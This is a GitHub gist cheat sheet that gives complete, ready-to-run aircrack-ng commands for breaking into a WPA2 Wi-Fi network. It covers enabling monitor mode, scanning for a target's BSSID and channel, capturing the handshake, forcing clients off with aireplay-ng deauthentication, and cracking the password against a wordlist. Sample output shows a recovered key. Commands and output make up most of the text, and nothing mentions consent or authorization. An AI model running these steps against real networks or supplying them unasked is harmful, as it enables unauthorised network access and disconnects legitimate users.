Skip to content

Instantly share code, notes, and snippets.

@dnorhoj

dnorhoj/aircrack-cheat-sheet.md

Created September 28, 2022 07:21
Show Gist options
  • Save dnorhoj/7afdf595c21e2e8e56ee4166387dd0d4 to your computer and use it in GitHub Desktop.
Save dnorhoj/7afdf595c21e2e8e56ee4166387dd0d4 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
aircrack-cheat-sheet.md

Aircrack-ng cheat sheet

Installing

Install aircrack-ng from your package manager.

Ex: sudo apt install aircrack-ng

Enter monitor mode

First get your network card name with

ip link

Here mine is wlan0

sudo airmon-ng start wlan0

Confirm that a wlan0mon now shows up in ip link.

If it didn't change to wlan0mon, you can try running the following command to kill network managers.

sudo airmon-ng check kill

And then try again.

Get network channel and BSSID

Start your first scan with the following command:

sudo airodump-ng wlan0mon

Which will show something similar to this:

 CH 14 ][ Elapsed: 0 s ][ 2022-09-27 18:47

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 12:34:56:78:90:AB    0        3        0    0   6  130   WPA2 CCMP   PSK  WIFI NAVN

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 12:34:56:78:90:AB  DE:AD:F0:0D:12:34  -37    1e- 6e     0        4

We will refer back to this later!

Start listening for a handshake

We need to gather the following information in order to start listening for a handshake.

  1. Network BSSID (mac address)
  2. Network channel

Afterwards we put the data into the following command

sudo airodump-ng --bssid <bssid> -c <channel> -w <output_file> wlan0mon

We can get the data from the example, here the BSSID would be 12:34:56:78:90:AB and the channel (CH column) is 6. So the final command would be something like this:

sudo airodump-ng --bssid 12:34:56:78:90:AB -c 6 -w out wlan0mon

This should just run in the background until you see that a handshake has been captured in the top right.

For now, you can put this in the background while we start deauthing the network.

Deauthing

While listening in another window, open a new terminal, and start deauthing.

sudo aireplay-ng -0 2 -a <bssid> (-c <station>)

You can include a station if you want to. It will most likely make the deauth more successful.

sudo aireplay-ng -0 2 -a 12:34:56:78:90:AB -c DE:AD:F0:0D:12:34

Keep repeating this (and maybe physically move closer to the router) until you get a WPA handshake in the previous window.

Cracking

Once you have the handshake, we just have to get cracking.

Find a wordlist (such as rockyou.txt) and then execute the following command:

aircrack-ng -w <wordlist> <output_file>-01.cap

Where <output-file> is the file you specified in Start listening for a handshake.

Give this some time, and if the password was in the wordlist, it will have cracked the password:

Here is an example of that screen.

                           Aircrack-ng 1.7 

  [00:00:00] 891019/10303727 keys tested (2175.29 k/s) 

  Time left: 1 hour, 18 minutes, 56 seconds                  0.00%

                       KEY FOUND! [ 13370420 ]


  Master Key     : DF 10 44 52 7C 59 22 F3 67 DC 83 0D CF 92 05 AE 
                   23 81 70 A1 96 1C 4E F7 98 2A D2 F5 50 1D E9 CE 

  Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

  EAPOL HMAC     : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Here the WiFi password is 13370420

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment